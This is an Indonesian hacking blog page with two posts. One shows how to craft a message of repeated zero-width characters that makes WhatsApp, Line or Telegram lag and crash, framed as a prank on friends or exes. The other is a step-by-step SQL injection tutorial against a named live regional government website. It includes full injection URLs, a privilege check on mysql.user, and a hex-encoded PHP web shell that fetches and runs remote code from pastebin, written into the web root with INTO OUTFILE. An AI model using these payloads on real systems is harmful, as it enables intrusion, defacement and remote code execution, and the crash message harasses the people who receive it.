Sabtu, 30 Maret 2019

Unik "baca selengkapnya" Bikin WhatsApp Lag & Crash

on   with Tidak ada komentar
Cara Bikin Virus
 Lag & Crash Whatsapp


P.. Kali ini gw mau share cara bikin virus lag Whatsapp.. tpi sebenernya bkn cmn Whatsapp doang gan yg ngelag.. virus nih juga bisa bikin lag line dan telegram.. Mayan buat ngerjain temen kita yg kayak kurang ajar:V atau bisa juga buat ngerjain mantan:B".. aowkwokwowkwowk.. okok langsung aja bahan"nya :

- ASCII CONVERTER (diplay store)
- TEXT REPEATER (diplay store)

Langkah langkah 

Pertama kita buka dulu Text Repeaternya.. trs klik "repeated text"


Kemudian masukan angka "8206 8207" trs limitnya kasih "1111" aja.. new line kita "centang" aja.. liat gambar dibawah.


Kemudian GENERATE..


Kalaw sudah generate kita salin semua angkanya.. kemudian buka ASCII Converter nya..


Lalu kita buat text terserah kita..  


Kemudian angka" yg tdi kita salin tdi ditext repeated pastekan di ASCII.. 


Terakhir salin tulisan nya.. yang di pojok kanan atas sebelah teks kita itu ... Lalu kita kirim ke temen/mantan kita:V"..



Ingat kita kirim aja .. jngn sampe kita ikutan klik "BACA SELENGKAPNYA":V.. ntar auto kek gitu.. aowkwowkwowk sekian
#thankss
#share and coment
Share:

Senin, 04 Maret 2019

Deface Sql Into Outfile

on   with Tidak ada komentar
Cara Deface Website
 Menggunakan
Teknik Into Outfile



Kali ini gw mau kasih cara deface dengan teknik into outfile.. Into outfile sendiri artinya kita langsng up shell pada sebuah website tanpa harus menjadi admin dari web tersebut.. Gw juga akan kasih live targetnya.. Biar gk kelamaan langsng aja..

Live target :

Langkah pertama untuk mengecek vuln sql auto tidak pada sebuah website ktta beri tanda string (').. 


Vuln gan.. Kemudian kita simpan tulisan C:\xampp\htdocs\portal_bpkpad\pages\single_page.php on line 149 dicatatan buat penempatan shell backdoor kita difinalnya:V"..

Next selanjutnya kembali ketarget kita

http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=-507201800004%27

Disini kita cari angka cantiknya dulu ya
Klo masih eror berarti kita harus cari angkanya lg klo gak eror berarti itu lah angka cantiknya..

Trus cara mencari angka cantiknya bgaimana caranya? 

Kita tambahkan +order+by+angkacantik--+

Contoh target kita 
http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=507201800004%27+order+by+15--+ 


Kalaw masih seperti itu cari lagi sampe gk error.. 


Lahh kalaw sudah kembali seperti semula berarti itu angka cantiknya.. 
http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=507201800004%27+order+by+11--+

Trus klo kita udh dapat angka cantiknya, selanjutnya 
Kita ganti yg +order+by+
Dengan +union+select+
Dan tambahkan angka dari 1 sampai angka cantiknya
Contoh

http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=507201800004%27+union+select+1,2,3,4,5,6,7,8,9,10,11--+

Kemudian kita tambahkan minus (-) diblkang id= contoh seperti digambar, fungsinya kita cari angka string user



Next selanjutnya kita cek usernya
Klo usernya root local berarti bisa di sql

Trus caranya bagaimana? 
Kita ganti angka string usernya yg tadi angka 4 dengan user().. Liat gambar dibawah



Next selanjutnya kita cek lg permissonnya
Klo Y berarti bisa di sql
Klo N berarti tidak bisa disql

Trus caranya bagaimana?

Tinggal kita ganti lg yg user() menjadi file_priv

Berarti seperti ini
http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=-507201800004%27+union+select+1,2,3,file_priv,5,6,7,8,9,10,11--+

Trus tambahkan lg setelah angka cantik +from+mysql.user

Seperti ini
http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=-507201800004%27+union+select+1,2,3,file_priv,5,6,7,8,9,10,11+from+mysql.user--+

Maka disitu lah jawabannya bisa atau tidaknya..
Klo jawabanya Y berarti bisa disql. Kalaw N berarti tidak bisa ok..


Krna target kita jawabannya Y berarti bisa disql

Next selanjutnya kita hapus lg, kita kembalikan lg kesemula target kita
Seperti ini
http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=507201800004%27+union+select+1,2,3,4,5,6,7,8,9,10,11--+

Lalu kita tambahkan kode hexa shell atau uploader kita diangka string user

Ini angka hexa shell mini gw

0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f69514462764a65752229293b3f3e

Jadi seperti ini

http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=-507201800004%27+union+select+1,2,3,0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f69514462764a65752229293b3f3e,5,6,7,8,9,10,11--+


Next selanjutnya kita tambahkan +INTO+OUTFILE'(Dir in yg tadi gw suruh simpan dinote)/namashell.php'

Contoh:
+INTO+OUTFILE'C:\xampp\htdocs\portal_bpkpad\pages/FALKA.php'

And jngan lupa kita ubah stringnya dari ini \ menjadi /

Mka akan seperti ini:
+INTO+OUTFILE'C:/xampp/htdocs/portal_bpkpad/pages/FALKA.php'

Kita tambahkan setelah angka cantik tadi 

http://dppka.tapselkab.go.id/portal_bpkpad/pages/single_page.php?id=-507201800004%27+union+select+1,2,3,0x3c3f706870206576616c28223f3e222e66696c655f6765745f636f6e74656e7473282268747470733a2f2f706173746562696e2e636f6d2f7261772f69514462764a65752229293b3f3e,5,6,7,8,9,10,11+INTO+OUTFILE'C:/xampp/htdocs/portal_bpkpad/pages/FALKA.php'--+

Nah klo sudah tinggal kita masuk ke dirnya targetnya ajj deh

http://dppka.tapselkab.go.id/portal_bpkpad/pages/


Lahh udh ketanem shellnya.. Kalaw udh gitu you know lah tinggal apa:V"..



Kwkwkkwkkkw.. Susah? Yah emng gan.. Pkoknya banyak" baca + praktek..
Thanks.. See You In Next Post
#Share and coment
Share: